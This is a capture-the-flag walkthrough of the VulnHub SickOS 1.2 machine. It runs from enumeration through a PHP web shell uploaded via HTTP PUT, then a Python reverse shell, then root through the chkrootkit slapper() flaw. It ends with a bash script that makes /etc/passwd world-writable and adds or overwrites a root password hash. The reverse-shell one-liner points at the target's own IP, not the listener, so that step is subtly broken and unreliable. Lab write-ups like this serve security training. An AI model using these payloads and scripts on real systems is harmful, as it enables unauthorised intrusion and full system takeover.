VulnHub – SickOS 1.2 Walkthrough
Introduction
This is a Linux box that involved abusing the HTTP PUT method to upload a PHP script, using it to obtain a reverse shell, and then escalating to root through a known vulnerability in chkrootkit, which runs from cron as root.
Enumeration
The first step is to run a TCP Nmap scan against the 1,000 most common ports, with the following flags:
- -sC to run default scripts
- -sV to enumerate applications versions
- -Pn to skip the host discovery phase, as some hosts will not respond to ping requests
- -oA to save the output in all three formats (normal, grepable and XML)
Enumerating the HTTP port
When accessing the web server, the following page is displayed:
The page source does not contain anything useful.
The next step is to run a scan for hidden files and directories using Wfuzz, with the following flags:
- -w to specify the word list to use
- --hc to hide responses with the given status codes (for example 404)
- the URL to scan, using FUZZ to mark the part of the path to fuzz
It looks like the "/test" entry leads to a directory served by lighttpd 1.4.28:
After searching on SearchSploit, no known exploits for this lighttpd version appear to be available.
The other entries return 403 Forbidden:
When checking the allowed methods with an OPTIONS request through curl, the PUT method is listed in the Allow header of the response. This could be used to upload a reverse shell into the /test directory.
curl -v -X OPTIONS http://10.10.10.131/test/
Exploiting file upload via PUT request
Using curl to upload a PHP file containing the following code, which will allow us to execute commands remotely (note the double quotes around cmd inside the PHP, so that the single quotes enclosing the request body are not cut short by the shell):
curl -v -X PUT -d '<?php echo system($_REQUEST["cmd"]); ?>' http://10.10.10.131/test/stef.php
When requesting the uploaded file, commands can be executed remotely through the "cmd" parameter (a successful response to the PUT is not proof by itself; fetch the file and run something harmless such as id first):
The next step is to set up a Netcat listener, which will catch our reverse shell when it is executed by the victim host, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip DNS lookups
- -p to specify the port to listen on
Executing a Python reverse shell through the cmd parameter; the port must match the one the listener is bound to, and the command has to be URL-encoded when it is sent in the query string, since it contains spaces, quotes and semicolons:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.131",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
The listener receives the callback and a reverse shell on the host is established:
Privilege Escalation
When inspecting the cron jobs on the machine, a job running "chkrootkit" stands out:
Chkrootkit is a common Unix-based program intended to help system administrators check their systems for known rootkits.
Using SearchSploit to find known vulnerabilities in chkrootkit:
Checking the chkrootkit version on the box: it matches the version the exploit targets.
Having a look at the exploit, the problem is in the slapper() function. It builds a list of file names with an unquoted variable assignment (file_port=$file_port $i); when $file_port is empty, the shell treats the rest of the line as a command to run, so a file named "update" in /tmp gets executed. Because the cron job runs chkrootkit as root, that file runs as root (this is CVE-2014-0476, fixed in chkrootkit 0.50):
Below it lists the steps required to exploit this vulnerability:
I created a quick bash script, saved as /tmp/update and made executable, that changes the permissions of the /etc/passwd file so it becomes writable:
A new root user can be created by adding a new line to the /etc/passwd file. The steps required are the following:
- Reading a few lines from the /etc/passwd file to verify the format
- Generating a new password hash using openssl
- Adding a new line to the /etc/passwd file in the same format, with the generated hash in place of the "x" in the password field
This could not be done with sed -i: it writes its result to a temporary file in the same directory and renames it over the original, and the current user has no permission to create files in /etc even though /etc/passwd itself is now writable. In this scenario I decided to instead replace the root user's password hash.
This can be done with awk, writing the result to /tmp and copying it back over the file, or by echoing the rebuilt contents into the file, as shown below:
Logging in over SSH as root with the new password:
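The privilege-escalation steps, as an added example that is not the original post's script: the /tmp/update payload, the openssl hash, and both ways of changing /etc/passwd (appending a second UID-0 user, or replacing root's hash with awk without sed -i). The functions take the passwd file as a parameter so they can be exercised against a constructed copy; on the box the argument would be /etc/passwd. The user name "toor" and the hash salt are assumptions:

```bash
#!/bin/bash
# Added example for this walkthrough, not the original post's script.
# The functions take the passwd file as a parameter so they can be tested on a
# constructed copy; on the target the argument is /etc/passwd.

# The file that chkrootkit's slapper() ends up running as root because of its
# unquoted variable. It only makes /etc/passwd writable; the rest is done by hand.
write_update_payload() {
  local path="$1"           # /tmp/update on the box
  printf '#!/bin/bash\nchmod 666 /etc/passwd\n' > "$path"
  chmod +x "$path"
}

# crypt(3) MD5 hash as in the post (openssl passwd -1); a fixed salt keeps it reproducible.
make_hash() {
  openssl passwd -1 -salt "$2" "$1"
}

# Plan A: append a second UID-0 user. Appending only needs write access on the file.
add_root_user() {
  local file="$1" name="$2" hash="$3"
  printf '%s:%s:0:0:root:/root:/bin/bash\n' "$name" "$hash" >> "$file"
}

# Plan B (what the post did): replace root's hash. `sed -i` fails here because it
# writes a temp file next to the target and renames it, which needs write access on
# /etc. awk into /tmp and `cat >` back over the original needs write on the file only.
set_root_hash() {
  local file="$1" hash="$2" tmp
  tmp=$(mktemp /tmp/passwd.XXXXXX)
  awk -F: -v h="$hash" 'BEGIN{OFS=":"} $1=="root"{$2=h} {print}' "$file" > "$tmp"
  cat "$tmp" > "$file"
  rm -f "$tmp"
}

# Checks worth running before trying to log in.
hash_field() { awk -F: -v u="$2" '$1==u{print $2}' "$1"; }
uid0_users() { awk -F: '$3==0{print $1}' "$1" | tr '\n' ' '; }
line_count() { awk 'END{print NR}' "$1"; }
```

On the box the sequence is: write_update_payload /tmp/update, wait for the cron job to run chkrootkit, confirm /etc/passwd is now writable (ls -l /etc/passwd), then either add_root_user or set_root_hash with a hash from make_hash, and check the result with hash_field before opening the SSH session.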
Conclusion
This was a really fun box. Although the initial exploitation process wasn't that hard, it is definitely not something you see every day. What I liked most was the vulnerability in the chkrootkit tool, as this rootkit detection tool is something you see quite often on Linux and not something you'd expect to carry such a critical vulnerability.